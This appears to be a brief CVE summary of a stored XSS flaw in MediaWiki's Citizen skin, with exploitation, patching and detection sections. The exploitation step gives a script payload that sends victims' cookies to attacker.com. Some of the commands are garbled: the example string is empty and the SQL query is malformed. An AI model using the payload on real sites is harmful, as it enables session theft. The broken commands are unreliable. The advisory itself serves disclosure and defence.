Listen to this Post
How the CVE Works
The vulnerability arises in the `Citizen` skin for MediaWiki, where user registration date messages (Language::userDate) are rendered without proper HTML escaping. An attacker with `editinterface` permissions (but not editsitejs) can inject malicious scripts via date-related messages. These scripts execute when other users view the affected profile or registration date. The unescaped output occurs in CitizenComponentUserInfo.php, where `userDate` results are directly embedded into raw HTML. For example, a crafted date string like `` would execute in victims’ browsers.
DailyCVE Form
Platform: MediaWiki (Citizen Skin)
Version: >= 3.3.0, < 3.3.1
Vulnerability: Stored XSS
Severity: Moderate
Date: Jun 13, 2025
Prediction: Patch expected by Jun 20, 2025
What Undercode Say:
Exploitation:
1. Payload Injection:
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
Insert via date message editing.
- Trigger: Victims loading profiles with malicious dates execute the payload.
Protection:
1. Patch Upgrade:
composer require starcitizentools/citizen-skin:3.3.1
2. Manual Fix: Escape `userDate` output:
echo htmlspecialchars($this->lang->userDate($timestamp, $this->user));
3. Mitigation: Restrict `editinterface` permissions.
Detection:
grep -r "userDate.html" /path/to/mediawiki/skins/Citizen/
Log Analysis:
SELECT FROM logging WHERE log_type = 'edit' AND log_ LIKE '%date%';
References:
- GitHub Advisory
- NVD Entry
Note: All commands assume Linux/env and require validation in target systems.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
